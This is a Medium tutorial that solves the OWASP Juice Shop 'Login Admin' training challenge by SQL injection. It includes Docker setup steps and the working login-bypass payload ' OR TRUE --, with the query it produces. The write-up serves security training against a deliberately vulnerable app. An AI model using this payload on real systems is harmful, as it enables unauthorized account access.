OWASP Juice Shop — Login Admin Challenge Solution

Solving OWASP Juice Shop challenge with SQL injection

What is OWASP Juice Shop?

OWASP Juice Shop is a vulnerable web application for security risk awareness and training. It is an open-source project written in Node. js, Express, and Angular.

In this tutorial, I am going to demonstrate how to solve challenges in OWASP Juice Shop using basic SQL injections.

Before getting into that, let’s look at what is SQL injection?

SQL injection is a common vulnerability where an attacker injects malicious SQL code into the SQL query running on the server-side. SQL query running on the server side takes the client’s input as a parameter, an attacker can modify the query in a way that exposes, modify, or destroy the data in the database.

The Juice shop is not properly validating user inputs. so this gives the possibility of SQL injection attack.

How to setup OWASP Juice shop locally

  1. Get Docker instance for Juice Shop
~$ docker pull bkimminich/juice-shop:v8.7.3

2. Start the Juice shop docker instance

~$ docker run --rm -p 3000:3000 bkimminich/juice-shop:v8.7.3

Now you can access Juice shop usinglocalhost:3000

Login Admin Challenge

OWASP juice shop login fields are vulnerable to SQL injection, which enables access to unauthorized access to the system.

Let us inject SQL into the login field to bypass the login and login as the first user in the database.

First, create an error by giving 'as input to the email field and any string (here I used 111 for password) to the password field.

Check the Response in the browser Network tab. You can see the SQL query used in the login.

"SELECT * FROM Users WHERE email = ''' AND password = '698d51a19d8a121ce581499d7b701668' AND deletedAt IS NULL"

Here we used 'in the email input field to cause an SQL error.

Now we know the SQL query related to logging in. We can send ' OR TRUE -- as email input and any string as a password.

"SELECT * FROM Users WHERE email = '' OR TRUE -- AND password = '698d51a19d8a121ce581499d7b701668' AND deletedAt IS NULL"

here,

  1. ' character close the email string.
  2. OR is a SQL query
  3. TRUE is a boolean value
  4. --will comment out the SQL query after the TRUE

So, now the SQL will check for email = '' or true which is always a TRUE statement.

What user did you login to?

This SQL injection will log us as the first user in the database.

You can easily find the logged-in user details when you check the browser Network tab.

logged in user details

Now we are logged in as Admin!!!

You can find my new tutorial on how to access and in OWASP Juice Shop here.

The Startup

Get smarter at building your thing. Join The Startup’s +792K followers.

Sign up for Top 10 Stories

By The Startup

Get smarter at building your thing. Subscribe to receive The Startup's top 10 most read stories — delivered straight into your inbox, once a week. Take a look.

By signing up, you will create a Medium account if you don’t already have one. Review our Privacy Policy for more information about our privacy practices.

Check your inbox
Medium sent you an email at to complete your subscription.

The Startup

Get smarter at building your thing. Follow to join The Startup’s +8 million monthly readers & +792K followers.

Anusha Ihalapathirana

Written by

Software Engineer

The Startup

Get smarter at building your thing. Follow to join The Startup’s +8 million monthly readers & +792K followers.

Medium is an open platform where 170 million readers come to find insightful and dynamic thinking. Here, expert and undiscovered voices alike dive into the heart of any topic and bring new ideas to the surface. Learn more

Follow the writers, publications, and topics that matter to you, and you’ll see them on your homepage and in your inbox. Explore

If you have a story to tell, knowledge to share, or a perspective to offer — welcome home. It’s easy and free to post your thinking on any topic. Write on Medium

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store